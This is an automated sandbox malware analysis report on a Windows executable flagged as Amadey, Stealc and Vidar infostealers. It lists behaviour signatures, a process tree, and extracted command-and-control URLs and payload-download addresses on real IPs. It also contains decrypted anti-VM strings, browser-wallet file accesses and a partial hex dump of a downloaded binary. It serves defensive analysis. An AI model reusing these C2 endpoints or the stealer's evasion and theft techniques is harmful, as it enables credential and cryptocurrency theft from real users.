Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1467934
MD5:5df47a238d51fdad9b442feb6c833886
SHA1:9332ec9a71256cfdea81cfbf8627f0a274802b1d
SHA256:d06e1fd08af8234eb7d356343329905327126518eea8bee8e00f10aeaf7d3a09
Tags:exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5DF47A238D51FDAD9B442FEB6C833886)
    • cmd.exe (PID: 7020 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • JJEGIJEGDB.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" MD5: 1608CACCC377A28575B839E3EEC49314)
        • explorti.exe (PID: 1308 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: 1608CACCC377A28575B839E3EEC49314)
    • cmd.exe (PID: 7060 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorti.exe (PID: 4884 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 1608CACCC377A28575B839E3EEC49314)
  • explorti.exe (PID: 7548 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 1608CACCC377A28575B839E3EEC49314)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "85.28.47.30/920475a59bac849d.php"}
{"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
{"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000003.1835353412.00000000051C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000009.00000003.1883081687.0000000004D60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000009.00000002.1923368430.0000000000191000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000008.00000002.1915365040.0000000000191000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              5.2.JJEGIJEGDB.exe.a10000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                12.2.explorti.exe.190000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  9.2.explorti.exe.190000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    8.2.explorti.exe.190000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      0.2.file.exe.4b0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 1 entries
                        No Sigma rule has matched
                        Timestamp:07/05/24-04:35:57.847864
                        SID:2044244
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/05/24-04:35:57.138371
                        SID:2044243
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/05/24-04:35:58.030501
                        SID:2051828
                        Source Port:80
                        Destination Port:49730
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/05/24-04:35:58.031752
                        SID:2044246
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/05/24-04:35:58.217968
                        SID:2051831
                        Source Port:80
                        Destination Port:49730
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/05/24-04:37:02.781207
                        SID:2856147
                        Source Port:49744
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: file.exeAvira: detected
                        Source: http://85.28.47.30/69934896f997d5bb/softokn3.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exeAvira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/cost/go.exeAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/freebl3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/softokn3.dll=Avira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/nss3.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.php/Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/nss3.dlldfAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/sqlite3.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/920475a59bac849d.phpIAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/vcruntime140.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/mozglue.dllhgAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exe-Disposition:Avira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/mine/amadka.exeQAvira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/mine/amadka.exe00Avira URL Cloud: Label: phishing
                        Source: 85.28.47.30/920475a59bac849d.phpAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/920475a59bac849d.phpAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/msvcp140.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeDataAvira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/cost/go.exe00Avira URL Cloud: Label: phishing
                        Source: http://77.91.77.82/Hun4Ko/index.php#Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/mozglue.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30Avira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: 0.2.file.exe.4b0000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
                        Source: explorti.exe.7548.12.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
                        Source: file.exe.6436.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "85.28.47.30/920475a59bac849d.php"}
                        Source: http://77.91.77.81/mine/amadka.exeVirustotal: Detection: 26%Perma Link
                        Source: http://77.91.77.81/cost/go.exeVirustotal: Detection: 27%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpGVirustotal: Detection: 21%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpZVirustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php/Virustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpVirustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpVirustotal: Detection: 24%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php-Virustotal: Detection: 21%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exe-Disposition:Virustotal: Detection: 25%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exeQVirustotal: Detection: 18%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exe00Virustotal: Detection: 25%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php9Virustotal: Detection: 20%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeReversingLabs: Detection: 42%
                        Source: file.exeVirustotal: Detection: 47%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeJoe Sandbox ML: detected
                        Source: file.exeJoe Sandbox ML: detected
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: INSERT_KEY_HERE
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetProcAddress
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: LoadLibraryA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: lstrcatA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: OpenEventA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CreateEventA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CloseHandle
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: Sleep
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetUserDefaultLangID
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: VirtualAllocExNuma
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: VirtualFree
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetSystemInfo
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: VirtualAlloc
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: HeapAlloc
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetComputerNameA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: lstrcpyA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetProcessHeap
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetCurrentProcess
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: lstrlenA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: ExitProcess
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GlobalMemoryStatusEx
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetSystemTime
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: SystemTimeToFileTime
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: advapi32.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: gdi32.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: user32.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: crypt32.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: ntdll.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetUserNameA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CreateDCA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetDeviceCaps
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: ReleaseDC
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CryptStringToBinaryA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: sscanf
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: VMwareVMware
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: HAL9TH
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: JohnDoe
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: DISPLAY
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: %hu/%hu/%hu
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: http://85.28.47.30
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: /920475a59bac849d.php
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: /69934896f997d5bb/
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: Nice
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetEnvironmentVariableA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetFileAttributesA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GlobalLock
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: HeapFree
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetFileSize
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GlobalSize
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: IsWow64Process
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: Process32Next
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetLocalTime
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: FreeLibrary
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetTimeZoneInformation
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetSystemPowerStatus
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetVolumeInformationA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetWindowsDirectoryA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: Process32First
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetLocaleInfoA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetModuleFileNameA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: DeleteFileA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: FindNextFileA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: LocalFree
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: FindClose
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: SetEnvironmentVariableA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: LocalAlloc
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetFileSizeEx
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: ReadFile
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: SetFilePointer
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: WriteFile
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CreateFileA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: FindFirstFileA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CopyFileA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: VirtualProtect
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetLastError
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: lstrcpynA
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: MultiByteToWideChar
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GlobalFree
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: WideCharToMultiByte
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GlobalAlloc
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: OpenProcess
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: TerminateProcess
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: GetCurrentProcessId
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: gdiplus.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: ole32.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: bcrypt.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: wininet.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: shlwapi.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: shell32.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: psapi.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: rstrtmgr.dll
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: CreateCompatibleBitmap
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: SelectObject
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: BitBlt
                        Source: 0.2.file.exe.4b0000.0.unpackString decryptor: DeleteObject
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C606C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C606C80
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 85.28.47.30:80
                        Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 85.28.47.30:80
                        Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.30:80 -> 192.168.2.4:49730
                        Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 85.28.47.30:80
                        Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.30:80 -> 192.168.2.4:49730
                        Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49744 -> 77.91.77.82:80
                        Source: Malware configuration extractorURLs: 85.28.47.30/920475a59bac849d.php
                        Source: Malware configuration extractorURLs: http://85.28.47.30/920475a59bac849d.php
                        Source: Malware configuration extractorIPs: 77.91.77.82
                        Source: Malware configuration extractorIPs: 77.91.77.82
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:35:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 